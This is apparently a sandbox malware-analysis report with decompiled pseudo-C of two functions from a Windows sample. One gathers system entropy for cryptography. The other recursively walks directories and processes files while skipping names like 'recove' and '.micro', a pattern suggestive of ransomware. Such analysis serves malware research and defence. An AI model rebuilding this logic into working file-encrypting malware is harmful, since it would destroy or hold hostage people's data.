Dynamic/Packed Code Coverage

Signature Coverage

Execution Coverage:	17.8%
Dynamic/Decrypted Code Coverage:	1%
Signature Coverage:	4.4%
Total number of Nodes:	2000
Total number of Limit Nodes:	58

Entrypoint
Key Decision
Dynamic/Decrypted
Unpacker/Decrypter
Executed
Not Executed
Unknown
Signature Matched
Richest Path
Thread / callback entry
Thread / callback creation
Show Help

Hide legend

Hide Nodes/Edges

Executed Functions

Function 0041C8F0, Relevance: 126.5, APIs: 48, Strings: 24, Instructions: 472

C-Code - Quality: 52%

			E0041C8F0() {
				signed int _v8;
				char _v96;
				char _v108;
				char _v116;
				char _v128;
				void* _v1156;
				void* _v1160;
				struct _OSVERSIONINFOW _v1420;
				struct _MEMORYSTATUS _v2012;
				void* _v2052;
				void* _v2056;
				void* _v2060;
				char _v2064;
				void* _v2076;
				_Unknown_base(*)()* _v2096;
				void* _v2100;
				char _v2104;
				_Unknown_base(*)()* _v2108;
				void* _v2112;
				intOrPtr* _v2116;
				_Unknown_base(*)()* _v2120;
				_Unknown_base(*)()* _v2124;
				_Unknown_base(*)()* _v2128;
				_Unknown_base(*)()* _v2132;
				char _v2136;
				int _v2140;
				_Unknown_base(*)()* _v2144;
				_Unknown_base(*)()* _v2148;
				void* _v2152;
				void* _v2156;
				void* _v2160;
				void* _v2164;
				void* _v2168;
				void* _v2172;
				void* _v2176;
				intOrPtr _v2180;
				char _v2188;
				void* _v2192;
				char _v2200;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t130;
				struct HINSTANCE__* _t137;
				struct HINSTANCE__* _t138;
				intOrPtr _t141;
				intOrPtr* _t142;
				intOrPtr _t144;
				intOrPtr* _t145;
				_Unknown_base(*)()* _t161;
				void* _t163;
				intOrPtr* _t170;
				_Unknown_base(*)()* _t199;
				void* _t201;
				void* _t203;
				_Unknown_base(*)()* _t213;
				void* _t215;
				intOrPtr _t218;
				intOrPtr* _t219;
				void* _t222;
				intOrPtr* _t223;
				struct HINSTANCE__* _t227;
				void* _t228;
				int _t229;
				intOrPtr* _t230;
				intOrPtr* _t253;
				struct HINSTANCE__* _t269;
				void* _t270;
				void* _t274;
				void* _t276;
				signed int _t278;
				signed int _t280;
				long long* _t283;
				long long* _t284;
				long long* _t286;
				long long* _t287;
				long long* _t288;
				long long* _t289;
				long long* _t290;
				long long* _t291;
				long long _t347;

				_t280 = (_t278 & 0xffffffc0) - 0x874;
				_t130 =  *0x43f054; // 0xd6baf341
				_v8 = _t130 ^ _t280;
				_v2136 = 0;
				_v2140 = 0;
				_v1420.dwOSVersionInfoSize = 0x114;
				GetVersionExW( &_v1420);
				_v2144 = LoadLibraryW(L"ADVAPI32.DLL");
				_t269 = LoadLibraryW(L"KERNEL32.DLL"); // executed
				_t137 = LoadLibraryW(L"NETAPI32.DLL"); // executed
				_t227 = _t137;
				if(_t227 != 0) {
					_v2132 = GetProcAddress(_t227, "NetStatisticsGet");
					_t213 = GetProcAddress(_t227, "NetApiBufferFree");
					_t253 = _v2132;
					_v2148 = _t213;
					if(_t253 != 0 && _t213 != 0) {
						_t256 =  &_v2152;
						_t215 =  *_t253(0, L"LanmanWorkstation", 0, 0,  &_v2152); // executed
						if(_t215 == 0) {
							_t11 = _t222 + 0xc; // 0x41c0d0
							_t223 =  *_t11;
							if(_t223 != 0) {
								_t347 =  *0x43bef8;
								_t291 = _t280 - 8;
								 *_t291 = _t347;
								 *_t223(_v2172, 0xd8);
								_t280 = _t291 + 0x10;
							}
							_t256 = _v2172;
							_v2168(_v2172);
						}
						_push( &_v2172);
						_push(0);
						_push(0);
						_push(L"LanmanServer");
						_push(0); // executed
						if(_v2152() == 0) {
							_t218 =  *0x462890; // 0x440288
							if(_t218 == 0) {
								_t218 = 0x440288;
								 *0x462890 = 0x440288;
							}
							_t17 = _t218 + 0xc; // 0x41c0d0
							_t219 =  *_t17;
							if(_t219 != 0) {
								_t347 =  *0x43bef0;
								_t290 = _t280 - 8;
								 *_t290 = _t347;
								 *_t219(_v2192, 0x44);
								_t280 = _t290 + 0x10;
							}
							_t256 = _v2192;
							_v2188(_v2192);
						}
					}
					FreeLibrary(_t227); // executed
				}
				_t138 = _v2144;
				if(_t138 != 0) {
					_t230 = GetProcAddress(_t138, "CryptAcquireContextW");
					_v2152 = GetProcAddress(_v2144, "CryptGenRandom");
					_t199 = GetProcAddress(_v2144, "CryptReleaseContext");
					_v2148 = _t199;
					if(_t230 != 0 && _v2152 != 0 && _t199 != 0) {
						_t256 =  &_v2136;
						_t201 =  *_t230( &_v2136, 0, 0, 1, 0xf0000000); // executed
						if(_t201 != 0) {
							_push( &_v96);
							_push(0x40);
							_push(_v2156);
							if(_v2172() != 0) {
								asm("fldz");
								_t289 = _t280 - 8;
								 *_t289 = _t347;
								E0041C8B0(0x40,  &_v108);
								_t280 = _t289 + 8;
								_v2172 = 1;
							}
							_t256 = _v2168;
							_v2180(_v2168, 0);
						}
						_t203 =  *_t230( &_v2156, 0, L"Intel Hardware Cryptographic Service Provider", 0x16, 0); // executed
						if(_t203 != 0) {
							_t256 = _v2176;
							_push( &_v116);
							_push(0x40);
							_push(_v2176);
							if(_v2192() != 0) {
								_t347 =  *0x43bee8;
								_t288 = _t280 - 8;
								 *_t288 = _t347;
								_t256 =  &_v128;
								E0041C8B0(0x40,  &_v128);
								_t280 = _t288 + 8;
								_v2192 = 1;
							}
							_v2200(_v2188, 0);
						}
					}
					FreeLibrary(_v2144);
				}
				if(_t269 == 0) {
					L72:
					E0041CF50(_t347);
					GlobalMemoryStatus( &_v2012);
					_t141 =  *0x462890; // 0x440288
					if(_t141 == 0) {
						_t141 = 0x440288;
						 *0x462890 = 0x440288;
					}
					_t124 = _t141 + 0xc; // 0x41c0d0
					_t142 =  *_t124;
					if(_t142 != 0) {
						asm("fld1");
						_v2188 = _t347;
						 *_t142( &_v2012, 0x20);
						_t280 = _t280 - 8 + 0x10;
					}
					_v2104 = GetCurrentProcessId();
					_t144 =  *0x462890; // 0x440288
					if(_t144 == 0) {
						_t144 = 0x440288;
						 *0x462890 = 0x440288;
					}
					_t127 = _t144 + 0xc; // 0x41c0d0
					_t145 =  *_t127;
					if(_t145 != 0) {
						asm("fld1");
						_v2188 = _t347;
						_t256 =  &_v2104;
						 *_t145( &_v2104, 4);
						_t280 = _t280 - 8 + 0x10;
					}
					_pop(_t270);
					_pop(_t274);
					_pop(_t228);
					return E004256FE(1, _t228, _v8 ^ _t280, _t256, _t270, _t274);
				} else {
					_t229 = 0;
					_v2152 = GetProcAddress(_t269, "CreateToolhelp32Snapshot");
					_v2096 = GetProcAddress(_t269, "CloseToolhelp32Snapshot");
					_v2132 = GetProcAddress(_t269, "Heap32First");
					_v2144 = GetProcAddress(_t269, "Heap32Next");
					_v2148 = GetProcAddress(_t269, "Heap32ListFirst");
					_v2108 = GetProcAddress(_t269, "Heap32ListNext");
					_v2120 = GetProcAddress(_t269, "Process32First");
					_v2112 = GetProcAddress(_t269, "Process32Next");
					_v2124 = GetProcAddress(_t269, "Thread32First");
					_v2116 = GetProcAddress(_t269, "Thread32Next");
					_v2128 = GetProcAddress(_t269, "Module32First");
					_t161 = GetProcAddress(_t269, "Module32Next");
					_v2100 = _t161;
					if(_v2152 == 0 || _v2132 == 0 || _v2144 == 0 || _v2148 == 0 || _v2108 == 0 || _v2120 == 0 || _v2112 == 0 || _v2124 == 0 || _v2116 == 0 || _v2128 == 0 || _t161 == 0) {
						L71:
						FreeLibrary(_t269);
						goto L72;
					} else {
						_t163 = CreateToolhelp32Snapshot(0xf, 0); // executed
						_v2156 = _t163;
						if(_t163 == 0xffffffff) {
							goto L71;
						}
						_v2060 = 0x10;
						if(_v2144 != 0) {
							_t69 = GetTickCount() + 0x3e8; // 0x3e8
							_t229 = _t69;
							_t163 = _v2156;
						}
						if(Heap32ListFirst(_t163,  &_v2060) == 0) {
							L52:
							_v2012.dwTotalVirtual = 0x22c;
							if(_v2148 != 0) {
								_t89 = GetTickCount() + 0x3e8; // 0x3e8
								_t229 = _t89;
							}
							if(Process32First(_v2160,  &(_v2012.dwTotalVirtual)) == 0) {
								L57:
								_v2052 = 0x1c;
								if(_v2152 != 0) {
									_t100 = GetTickCount() + 0x3e8; // 0x3e8
									_t229 = _t100;
								}
								if(Thread32First(_v2164,  &_v2052) == 0) {
									L62:
									_v1156 = 0x428;
									if(_v2156 != 0) {
										_t111 = GetTickCount() + 0x3e8; // 0x3e8
										_t229 = _t111;
									}
									_t256 =  &_v1156;
									if(Module32First(_v2168,  &_v1156) == 0) {
										L68:
										_t170 = _v2116;
										if(_t170 == 0) {
											_t256 = _v2172;
											CloseHandle(_v2172);
										} else {
											 *_t170(_v2172);
										}
										goto L71;
									} else {
										do {
											_t347 =  *0x43bed0;
											_t283 = _t280 - 8;
											 *_t283 = _t347;
											E0041C8B0(_v1160,  &_v1160);
											_t256 = _v2172;
											_t280 = _t283 + 8;
										} while (Module32Next(_v2172,  &_v1160) != 0 && GetTickCount() < _t229);
										goto L68;
									}
								} else {
									do {
										_t347 =  *0x43bec8;
										_t284 = _t280 - 8;
										 *_t284 = _t347;
										E0041C8B0(_v2056,  &_v2056);
										_t280 = _t284 + 8;
									} while (Thread32Next(_v2168,  &_v2056) != 0 && GetTickCount() < _t229);
									goto L62;
								}
							} else {
								do {
									_t347 =  *0x43bed0;
									_v2200 = _t347;
									E0041C8B0(_v2012.dwAvailPageFile,  &(_v2012.dwAvailPageFile));
									_t280 = _t280 - 8 + 8;
								} while (Process32Next(_v2164,  &(_v2012.dwAvailPageFile)) != 0 && GetTickCount() < _t229);
								goto L57;
							}
						} else {
							do {
								_t347 =  *0x43bee0;
								_t286 = _t280 - 8;
								 *_t286 = _t347;
								E0041C8B0(_v2064,  &_v2064);
								_t280 = _t286 + 8;
								_v2100 = 0x24;
								if(Heap32First( &_v2100, _v2060, _v2056) == 0) {
									goto L50;
								}
								_t276 = 0x50;
								while(1) {
									_t347 =  *0x43bed8;
									_t287 = _t280 - 8;
									 *_t287 = _t347;
									E0041C8B0(_v2112,  &_v2112);
									_t280 = _t287 + 8;
									if(Heap32Next( &_v2112) == 0) {
										break;
									}
									_t276 = _t276 - 1;
									if(_t276 > 0) {
										continue;
									}
									break;
								}
								L50:
							} while (Heap32ListNext(_v2172,  &_v2076) != 0 && GetTickCount() < _t229);
							goto L52;
						}
					}
				}
			}

0x0041c8f8
0x0041c8fe
0x0041c905
0x0041c910
0x0041c914
0x0041c921
0x0041c92c
0x0041c944
0x0041c94f
0x0041c951
0x0041c959
0x0041c95d
0x0041c971
0x0041c975
0x0041c977
0x0041c97b
0x0041c981
0x0041c98f
0x0041c99f
0x0041c9a3
0x0041c9b8
0x0041c9b8
0x0041c9bd
0x0041c9bf
0x0041c9c9
0x0041c9cc
0x0041c9d5
0x0041c9d7
0x0041c9d7
0x0041c9da
0x0041c9df
0x0041c9df
0x0041c9e7
0x0041c9e8
0x0041c9ea
0x0041c9ec
0x0041c9f1
0x0041c9f9
0x0041c9fb
0x0041ca02
0x0041ca04
0x0041ca09
0x0041ca09
0x0041ca0e
0x0041ca0e
0x0041ca13
0x0041ca15
0x0041ca1f
0x0041ca22
0x0041ca28
0x0041ca2a
0x0041ca2a
0x0041ca2d
0x0041ca32
0x0041ca32
0x0041c9f9
0x0041ca37
0x0041ca37
0x0041ca3d
0x0041ca43
0x0041ca51
0x0041ca69
0x0041ca6d
0x0041ca6f
0x0041ca75
0x0041ca99
0x0041ca9e
0x0041caa2
0x0041caaf
0x0041cab0
0x0041cab2
0x0041cab9
0x0041cabb
0x0041cabd
0x0041cac5
0x0041cacf
0x0041cad4
0x0041cad7
0x0041cad7
0x0041cadf
0x0041cae6
0x0041cae6
0x0041cafa
0x0041cafe
0x0041cb00
0x0041cb0b
0x0041cb0c
0x0041cb0e
0x0041cb15
0x0041cb17
0x0041cb1d
0x0041cb25
0x0041cb28
0x0041cb2f
0x0041cb34
0x0041cb37
0x0041cb37
0x0041cb46
0x0041cb46
0x0041cafe
0x0041cb4f
0x0041cb4f
0x0041cb57
0x0041ceb0
0x0041ceb0
0x0041cebd
0x0041cec3
0x0041ceca
0x0041cecc
0x0041ced1
0x0041ced1
0x0041ced6
0x0041ced6
0x0041cedb
0x0041cedd
0x0041cee2
0x0041ceef
0x0041cef1
0x0041cef1
0x0041cefa
0x0041cefe
0x0041cf05
0x0041cf07
0x0041cf0c
0x0041cf0c
0x0041cf11
0x0041cf11
0x0041cf16
0x0041cf18
0x0041cf1d
0x0041cf20
0x0041cf27
0x0041cf29
0x0041cf29
0x0041cf33
0x0041cf34
0x0041cf35
0x0041cf45
0x0041cb5d
0x0041cb63
0x0041cb6d
0x0041cb79
0x0041cb85
0x0041cb91
0x0041cb9d
0x0041cba9
0x0041cbb5
0x0041cbc1
0x0041cbcd
0x0041cbd9
0x0041cbe5
0x0041cbe9
0x0041cbef
0x0041cbf5
0x0041cea9
0x0041ceaa
0x00000000
0x0041cc5d
0x0041cc60
0x0041cc62
0x0041cc69
0x00000000
0x00000000
0x0041cc75
0x0041cc81
0x0041cc85
0x0041cc85
0x0041cc8b
0x0041cc8b
0x0041cc9b
0x0041cd40
0x0041cd45
0x0041cd50
0x0041cd54
0x0041cd54
0x0041cd54
0x0041cd6d
0x0041cdac
0x0041cdb1
0x0041cdbc
0x0041cdc0
0x0041cdc0
0x0041cdc0
0x0041cdd9
0x0041ce18
0x0041ce1d
0x0041ce28
0x0041ce2c
0x0041ce2c
0x0041ce2c
0x0041ce36
0x0041ce45
0x0041ce8d
0x0041ce8d
0x0041ce93
0x0041ce9e
0x0041cea3
0x0041ce95
0x0041ce9a
0x0041ce9a
0x00000000
0x0041ce47
0x0041ce50
0x0041ce50
0x0041ce5d
0x0041ce67
0x0041ce6a
0x0041ce6f
0x0041ce73
0x0041ce83
0x00000000
0x0041ce50
0x0041cddb
0x0041cddb
0x0041cddb
0x0041cde8
0x0041cdf2
0x0041cdf5
0x0041cdfe
0x0041ce0e
0x00000000
0x0041cddb
0x0041cd6f
0x0041cd6f
0x0041cd6f
0x0041cd86
0x0041cd89
0x0041cd92
0x0041cda2
0x00000000
0x0041cd6f
0x0041cca1
0x0041cca1
0x0041cca1
0x0041ccab
0x0041ccb5
0x0041ccb8
0x0041cccb
0x0041ccd5
0x0041cce3
0x00000000
0x00000000
0x0041cce5
0x0041ccf0
0x0041ccf0
0x0041ccfa
0x0041cd01
0x0041cd04
0x0041cd09
0x0041cd17
0x00000000
0x00000000
0x0041cd19
0x0041cd1c
0x00000000
0x00000000
0x00000000
0x0041cd1c
0x0041cd24
0x0041cd32
0x00000000
0x0041cca1
0x0041cc9b
0x0041cbf5

APIs

GetVersionExW.KERNEL32 ref: 0041C92C
LoadLibraryW.KERNEL32(ADVAPI32.DLL), ref: 0041C93D
LoadLibraryW.KERNEL32(KERNEL32.DLL), ref: 0041C948
LoadLibraryW.KERNEL32(NETAPI32.DLL), ref: 0041C951
GetProcAddress.KERNEL32(00000000,NetStatisticsGet), ref: 0041C969
GetProcAddress.KERNEL32(00000000,NetApiBufferFree), ref: 0041C975
NetStatisticsGet.NETAPI32(00000000,LanmanWorkstation,00000000,00000000,?), ref: 0041C99F
NetStatisticsGet.NETAPI32(00000000,LanmanServer,00000000,00000000,?), ref: 0041C9F3
FreeLibrary.KERNELBASE(00000000), ref: 0041CA37
GetProcAddress.KERNEL32(?,CryptAcquireContextW), ref: 0041CA4F
GetProcAddress.KERNEL32(?,CryptGenRandom), ref: 0041CA5D
GetProcAddress.KERNEL32(?,CryptReleaseContext), ref: 0041CA6D
FreeLibrary.KERNEL32(?), ref: 0041CB4F
GetProcAddress.KERNEL32(00000000,CreateToolhelp32Snapshot), ref: 0041CB65
GetProcAddress.KERNEL32(00000000,CloseToolhelp32Snapshot), ref: 0041CB71
GetProcAddress.KERNEL32(00000000,Heap32First), ref: 0041CB7D
GetProcAddress.KERNEL32(00000000,Heap32Next), ref: 0041CB89
GetProcAddress.KERNEL32(00000000,Heap32ListFirst), ref: 0041CB95
GetProcAddress.KERNEL32(00000000,Heap32ListNext), ref: 0041CBA1
GetProcAddress.KERNEL32(00000000,Process32First), ref: 0041CBAD
GetProcAddress.KERNEL32(00000000,Process32Next), ref: 0041CBB9
GetProcAddress.KERNEL32(00000000,Thread32First), ref: 0041CBC5
GetProcAddress.KERNEL32(00000000,Thread32Next), ref: 0041CBD1
GetProcAddress.KERNEL32(00000000,Module32First), ref: 0041CBDD
GetProcAddress.KERNEL32(00000000,Module32Next), ref: 0041CBE9
CreateToolhelp32Snapshot.KERNEL32(0000000F,00000000), ref: 0041CC60
GetTickCount.KERNEL32 ref: 0041CC83
Heap32ListFirst.KERNEL32(00000000,00000010), ref: 0041CC95
Heap32First.KERNEL32 ref: 0041CCDD
Heap32Next.KERNEL32(?), ref: 0041CD11
Heap32ListNext.KERNEL32(?,?), ref: 0041CD2E
GetTickCount.KERNEL32 ref: 0041CD36
GetTickCount.KERNEL32 ref: 0041CD52
Process32First.KERNEL32(?,0000022C), ref: 0041CD67
Process32Next.KERNEL32(?,?), ref: 0041CD9E
GetTickCount.KERNEL32 ref: 0041CDA6
GetTickCount.KERNEL32 ref: 0041CDBE
Thread32First.KERNEL32(?,0000001C), ref: 0041CDD3
Thread32Next.KERNEL32(?,?), ref: 0041CE0A
GetTickCount.KERNEL32 ref: 0041CE12
GetTickCount.KERNEL32 ref: 0041CE2A
Module32First.KERNEL32(?,00000428), ref: 0041CE3F
Module32Next.KERNEL32(?,?), ref: 0041CE7F
GetTickCount.KERNEL32 ref: 0041CE87
CloseHandle.KERNEL32(?), ref: 0041CEA3
FreeLibrary.KERNEL32(00000000), ref: 0041CEAA

Part of subcall function 0041CF50: QueryPerformanceCounter.KERNEL32(?,?,00000000,?,?), ref: 0041CF65
Part of subcall function 0041CF50: GetTickCount.KERNEL32(?,00000000,?,?), ref: 0041CFAC

GlobalMemoryStatus.KERNEL32(?), ref: 0041CEBD
GetCurrentProcessId.KERNEL32 ref: 0041CEF4

Part of subcall function 004256FE: IsDebuggerPresent.KERNEL32 ref: 00426D9A
Part of subcall function 004256FE: SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 00426DAF
Part of subcall function 004256FE: UnhandledExceptionFilter.KERNEL32(00431324), ref: 00426DBA
Part of subcall function 004256FE: GetCurrentProcess.KERNEL32(C0000409), ref: 00426DD6
Part of subcall function 004256FE: TerminateProcess.KERNEL32(00000000), ref: 00426DDD

Strings

Heap32First, xrefs: 0041CB73
Heap32ListFirst, xrefs: 0041CB8B
NETAPI32.DLL, xrefs: 0041C94A
$, xrefs: 0041CCD5
Heap32Next, xrefs: 0041CB7F
CryptReleaseContext, xrefs: 0041CA63
Thread32Next, xrefs: 0041CBC7
LanmanWorkstation, xrefs: 0041C998
CloseToolhelp32Snapshot, xrefs: 0041CB67
Thread32First, xrefs: 0041CBBB
Process32First, xrefs: 0041CBA3
ADVAPI32.DLL, xrefs: 0041C938
CryptAcquireContextW, xrefs: 0041CA49
CryptGenRandom, xrefs: 0041CA57
Process32Next, xrefs: 0041CBAF
Intel Hardware Cryptographic Service Provider, xrefs: 0041CAEE
NetStatisticsGet, xrefs: 0041C963
LanmanServer, xrefs: 0041C9EC
Module32First, xrefs: 0041CBD3
Module32Next, xrefs: 0041CBDF
Heap32ListNext, xrefs: 0041CB97
NetApiBufferFree, xrefs: 0041C96B
CreateToolhelp32Snapshot, xrefs: 0041CB5D
KERNEL32.DLL, xrefs: 0041C93F

Memory Dump Source

Source File: 00000001.00000002.1397105690.00400000.00000040.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_amhfnhe45.jbxd

Function 00413AB0, Relevance: 16.0, APIs: 3, Strings: 6, Instructions: 273

C-Code - Quality: 90%

			E00413AB0(intOrPtr* _a4, intOrPtr _a8) {
				signed int _v8;
				char _v8202;
				short _v8204;
				char _v16394;
				char _v16396;
				struct _WIN32_FIND_DATAW _v16988;
				void* _v16992;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t55;
				int _t64;
				int _t66;
				intOrPtr* _t71;
				char* _t85;
				char* _t86;
				intOrPtr* _t88;
				intOrPtr* _t92;
				intOrPtr* _t93;
				intOrPtr* _t94;
				intOrPtr* _t102;
				intOrPtr _t110;
				intOrPtr* _t114;
				intOrPtr* _t115;
				intOrPtr _t116;
				intOrPtr* _t118;
				intOrPtr* _t119;
				intOrPtr* _t120;
				void* _t128;
				void* _t131;
				signed int _t133;
				void* _t134;
				void* _t138;
				void* _t139;
				void* _t142;
				void* _t144;

				E0042E220(0x425c);
				_t55 =  *0x43f054; // 0xd6baf341
				_v8 = _t55 ^ _t133;
				_t102 = _a4;
				_v8204 = 0;
				E0042D0A0( &_v8202, 0, 0x1ffe);
				_v16396 = 0;
				E0042D0A0( &_v16394, 0, 0x1ffe);
				E0042623B( &_v8204, 0x1000, _t102);
				_t124 =  &_v8204;
				E00425ACD( &_v8204, 0x1000, L"\\*.*");
				_t138 = _t134 + 0x30;
				_t64 = FindFirstFileW( &_v8204,  &_v16988); // executed
				_t131 = _t64;
				_v16992 = _t131;
				if(_t131 != 0xffffffff) {
					do {
						if((_v16988.dwFileAttributes & 0x00000010) == 0) {
							if(_a8 == 1) {
								E0042623B( &_v8204, 0x1000, _t102);
								E00425ACD( &_v8204, 0x1000, 0x43456c);
								E00425ACD( &_v8204, 0x1000,  &(_v16988.cFileName));
								_t71 =  &(_v16988.cFileName);
								_t142 = _t138 + 0x24;
								_t124 = _t71 + 2;
								do {
									_t110 =  *_t71;
									_t71 = _t71 + 2;
								} while (_t110 != 0);
								_t130 = (_t71 - _t124 >> 1) + 1;
								_t132 = E0042629E( &(_v16988.cFileName));
								E0042614E(_t75, (_t71 - _t124 >> 1) + 1);
								_t144 = _t142 + 0xc;
								if(E00413A40(L"recove", _t75) == 0 && E00413A40(L".micro", _t132) == 0 && E004142A0(_t132) == 1) {
									E00413E50( &_v8204); // executed
								}
								E004258E3(_t132);
								_t131 = _v16992;
								goto L55;
							}
						} else {
							_t114 =  &(_v16988.cFileName);
							_t85 = ".";
							while(1) {
								_t124 =  *_t85;
								if(_t124 !=  *_t114) {
									break;
								}
								if(_t124 == 0) {
									L7:
									_t85 = 0;
								} else {
									_t16 =  &(_t85[2]); // 0x2e0000
									_t124 =  *_t16;
									if(_t124 !=  *((intOrPtr*)(_t114 + 2))) {
										break;
									} else {
										_t85 =  &(_t85[4]);
										_t114 = _t114 + 4;
										if(_t124 != 0) {
											continue;
										} else {
											goto L7;
										}
									}
								}
								L9:
								if(_t85 != 0) {
									_t115 =  &(_v16988.cFileName);
									_t86 = L"..";
									while(1) {
										_t124 =  *_t86;
										if(_t124 !=  *_t115) {
											break;
										}
										if(_t124 == 0) {
											L15:
											_t86 = 0;
										} else {
											_t19 =  &(_t86[2]); // 0x2e
											_t124 =  *_t19;
											if(_t124 !=  *((intOrPtr*)(_t115 + 2))) {
												break;
											} else {
												_t86 =  &(_t86[4]);
												_t115 = _t115 + 4;
												if(_t124 != 0) {
													continue;
												} else {
													goto L15;
												}
											}
										}
										L17:
										if(_t86 != 0) {
											E0042623B( &_v8204, 0x1000, _t102);
											_t88 = _t102;
											_t139 = _t138 + 0xc;
											_t22 = _t88 + 2; // 0x3
											_t128 = _t22;
											do {
												_t116 =  *_t88;
												_t88 = _t88 + 2;
											} while (_t116 != 0);
											if(_t88 - _t128 >> 1 > 3) {
												E00425ACD( &_v8204, 0x1000, 0x43456c);
												_t139 = _t139 + 0xc;
											}
											E00425ACD( &_v8204, 0x1000,  &(_v16988.cFileName));
											_t138 = _t139 + 0xc;
											_t118 =  &_v8204;
											_t92 = 0x478238;
											while(1) {
												_t124 =  *_t92;
												if(_t124 !=  *_t118) {
													break;
												}
												if(_t124 == 0) {
													L27:
													_t92 = 0;
												} else {
													_t124 =  *((intOrPtr*)(_t92 + 2));
													if(_t124 !=  *((intOrPtr*)(_t118 + 2))) {
														break;
													} else {
														_t92 = _t92 + 4;
														_t118 = _t118 + 4;
														if(_t124 != 0) {
															continue;
														} else {
															goto L27;
														}
													}
												}
												L29:
												if(_t92 != 0) {
													_t119 =  &_v8204;
													_t93 = 0x47a238;
													while(1) {
														_t124 =  *_t93;
														if(_t124 !=  *_t119) {
															break;
														}
														if(_t124 == 0) {
															L35:
															_t93 = 0;
														} else {
															_t124 =  *((intOrPtr*)(_t93 + 2));
															if(_t124 !=  *((intOrPtr*)(_t119 + 2))) {
																break;
															} else {
																_t93 = _t93 + 4;
																_t119 = _t119 + 4;
																if(_t124 != 0) {
																	continue;
																} else {
																	goto L35;
																}
															}
														}
														L37:
														if(_t93 != 0) {
															_t120 =  &_v8204;
															_t94 = 0x47c238;
															while(1) {
																_t124 =  *_t94;
																if(_t124 !=  *_t120) {
																	break;
																}
																if(_t124 == 0) {
																	L43:
																	_t94 = 0;
																} else {
																	_t124 =  *((intOrPtr*)(_t94 + 2));
																	if(_t124 !=  *((intOrPtr*)(_t120 + 2))) {
																		break;
																	} else {
																		_t94 = _t94 + 4;
																		_t120 = _t120 + 4;
																		if(_t124 != 0) {
																			continue;
																		} else {
																			goto L43;
																		}
																	}
																}
																L45:
																if(_t94 != 0) {
																	E00413AB0( &_v8204, _a8); // executed
																	_t124 =  &_v8204;
																	E0042623B( &_v16396, 0x1000,  &_v8204);
																	_t144 = _t138 + 0x14;
																	E00413500( &_v16396); // executed
																	L55:
																	_t138 = _t144 + 4;
																}
																goto L56;
															}
															asm("sbb eax, eax");
															asm("sbb eax, 0xffffffff");
															goto L45;
														}
														goto L56;
													}
													asm("sbb eax, eax");
													asm("sbb eax, 0xffffffff");
													goto L37;
												}
												goto L56;
											}
											asm("sbb eax, eax");
											asm("sbb eax, 0xffffffff");
											goto L29;
										}
										goto L56;
									}
									asm("sbb eax, eax");
									asm("sbb eax, 0xffffffff");
									goto L17;
								}
								goto L56;
							}
							asm("sbb eax, eax");
							asm("sbb eax, 0xffffffff");
							goto L9;
						}
						L56:
						_t66 = FindNextFileW(_t131,  &_v16988); // executed
					} while (_t66 != 0);
					_t64 = FindClose(_t131);
				}
				return E004256FE(_t64, _t102, _v8 ^ _t133, _t124, _t130, _t131);
			}

0x00413aba
0x00413abf
0x00413ac6
0x00413aca
0x00413ade
0x00413ae5
0x00413afc
0x00413b03
0x00413b18
0x00413b25
0x00413b31
0x00413b36
0x00413b47
0x00413b4d
0x00413b4f
0x00413b58
0x00413b5e
0x00413b65
0x00413d43
0x00413d56
0x00413d6f
0x00413d8a
0x00413d8f
0x00413d95
0x00413d98
0x00413da0
0x00413da0
0x00413da3
0x00413da6
0x00413daf
0x00413dc1
0x00413dc5
0x00413dca
0x00413ddb
0x00413dff
0x00413dff
0x00413e05
0x00413e0a
0x00000000
0x00413e0a
0x00413b6b
0x00413b6b
0x00413b71
0x00413b76
0x00413b76
0x00413b7c
0x00000000
0x00000000
0x00413b81
0x00413b98
0x00413b98
0x00413b83
0x00413b83
0x00413b83
0x00413b8b
0x00000000
0x00413b8d
0x00413b8d
0x00413b90
0x00413b96
0x00000000
0x00000000
0x00000000
0x00000000
0x00413b96
0x00413b8b
0x00413ba1
0x00413ba3
0x00413ba9
0x00413baf
0x00413bb4
0x00413bb4
0x00413bba
0x00000000
0x00000000
0x00413bbf
0x00413bd6
0x00413bd6
0x00413bc1
0x00413bc1
0x00413bc1
0x00413bc9
0x00000000
0x00413bcb
0x00413bcb
0x00413bce
0x00413bd4
0x00000000
0x00000000
0x00000000
0x00000000
0x00413bd4
0x00413bc9
0x00413bdf
0x00413be1
0x00413bf4
0x00413bf9
0x00413bfb
0x00413bfe
0x00413bfe
0x00413c01
0x00413c01
0x00413c04
0x00413c07
0x00413c13
0x00413c26
0x00413c2b
0x00413c2b
0x00413c41
0x00413c46
0x00413c49
0x00413c4f
0x00413c54
0x00413c54
0x00413c5a
0x00000000
0x00000000
0x00413c5f
0x00413c76
0x00413c76
0x00413c61
0x00413c61
0x00413c69
0x00000000
0x00413c6b
0x00413c6b
0x00413c6e
0x00413c74
0x00000000
0x00000000
0x00000000
0x00000000
0x00413c74
0x00413c69
0x00413c7f
0x00413c81
0x00413c87
0x00413c8d
0x00413c92
0x00413c92
0x00413c98
0x00000000
0x00000000
0x00413c9d
0x00413cb4
0x00413cb4
0x00413c9f
0x00413c9f
0x00413ca7
0x00000000
0x00413ca9
0x00413ca9
0x00413cac
0x00413cb2
0x00000000
0x00000000
0x00000000
0x00000000
0x00413cb2
0x00413ca7
0x00413cbd
0x00413cbf
0x00413cc5
0x00413ccb
0x00413cd0
0x00413cd0
0x00413cd6
0x00000000
0x00000000
0x00413cdb
0x00413cf2
0x00413cf2
0x00413cdd
0x00413cdd
0x00413ce5
0x00000000
0x00413ce7
0x00413ce7
0x00413cea
0x00413cf0
0x00000000
0x00000000
0x00000000
0x00000000
0x00413cf0
0x00413ce5
0x00413cfb
0x00413cfd
0x00413d0e
0x00413d13
0x00413d26
0x00413d2b
0x00413d35
0x00413e10
0x00413e10
0x00413e10
0x00000000
0x00413cfd
0x00413cf6
0x00413cf8
0x00000000
0x00413cf8
0x00000000
0x00413cbf
0x00413cb8
0x00413cba
0x00000000
0x00413cba
0x00000000
0x00413c81
0x00413c7a
0x00413c7c
0x00000000
0x00413c7c
0x00000000
0x00413be1
0x00413bda
0x00413bdc
0x00000000
0x00413bdc
0x00000000
0x00413ba3
0x00413b9c
0x00413b9e
0x00000000
0x00413b9e
0x00413e13
0x00413e1b
0x00413e21
0x00413e2a
0x00413e2a
0x00413e40

APIs

FindFirstFileW.KERNELBASE(?,?,?,?,?,?,?,?,?,?,?,00442040,00000001,00000000), ref: 00413B47
